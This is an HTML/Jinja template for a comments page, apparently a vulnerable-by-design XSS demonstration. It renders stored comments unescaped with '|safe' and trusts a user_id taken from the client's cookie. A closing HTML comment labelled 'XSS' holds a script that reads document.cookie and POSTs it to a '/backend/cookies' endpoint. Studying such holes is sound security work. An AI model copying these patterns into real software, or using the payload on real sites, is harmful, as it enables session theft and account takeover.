<!DOCTYPE html>
<html>
<head>
    <title>User Comments</title>
    <style> body { background-color: #fff; font-family: sans-serif; margin: 0; }

	header {
		display: flex;
		justify-content: space-between;
		align-items: center;
		background-color: #f5f5f5;
		padding: 20px;
		box-shadow: 0 2px 5px rgba(0, 0, 0, 0.2);
	}

	h1 {
		margin: 0;
		font-size: 28px;
		font-weight: bold;
		color: #0077cc;
		text-transform: uppercase;
		letter-spacing: 2px;
	}

	button {
		padding: 10px 20px;
		border-radius: 5px;
		border: none;
		color: #fff;
		background-color: #0077cc;
		cursor: pointer;
	}

	.comment-box {
		margin: 20px;
		padding: 20px;
		border: 1px solid #ddd;
		border-radius: 5px;
	}

	.comment-box textarea {
		width: 100%;
		height: 100px;
		padding: 10px;
		border-radius: 5px;
		border: 1px solid #ddd;
		resize: none;
		margin-bottom: 10px;
	}

	.comment-box button {
		margin-top: 10px;
	}

	.comment-list {
		margin: 20px;
		padding: 20px;
		border: 1px solid #ddd;
		border-radius: 5px;
	}

	.comment-list h3 {
		font-size: 24px;
		margin-top: 0;
	}

	.comment {
		margin-bottom: 10px;
		padding: 10px;
		border: 1px solid #ddd;
		border-radius: 5px;
	}

	.comment p {
		margin: 0;
		font-size: 16px;
	}

	.comment small {
		display: block;
		font-size: 12px;
		margin-top: 5px;
		color: #999;
	}
</style>
</head>
<body>
<header>
    <h1>Comments</h1>
    <div class="btn-group">
        <h1>Welcome {{user_data['user_name']}}</h1>
    </div>
</header>

<form method="POST" action="/post_comment" id="post_comment">
<div class="comment-box">
    <h3>Leave a Comment</h3>
    <textarea id="comment" name="comment" placeholder="Write your comment here"></textarea>
    <button>Submit</button>
</div>
</form>

<script>
    // 獲取cookies中的user_id值
    function getCookie(name) {
        var value = "; " + document.cookie;
        var parts = value.split("; " + name + "=");
        if (parts.length == 2) return parts.pop().split(";").shift();
    }
    var userId = getCookie("user_id");

    // 將user_id添加到表單數據中
    var form = document.getElementById("post_comment");
    var hiddenInput = document.createElement("input");
    hiddenInput.type = "hidden";
    hiddenInput.name = "user_id";
    hiddenInput.value = userId;
    form.appendChild(hiddenInput);
</script>


<div class="comment-list">
    <h3>Comments</h3>

        {% for comment in comment_list%}
    <div class="comment">

        <p>{{comment.comment_cotent|safe}}</p>
    </div>
        {% endfor %}

    </div>

</body>
</html>




<!--
XSS
<script>
(function() {
// 獲取當前頁面的cookies
var cookies=document.cookie;

	// 使用XMLHttpRequest將cookies發送到後台
	var xhr=new XMLHttpRequest();
	xhr.open('POST', '/backend/cookies', true);
	xhr.setRequestHeader('Content-Type', 'application/json');
	xhr.send(JSON.stringify({ cookies: cookies }));
})();
</script>
-->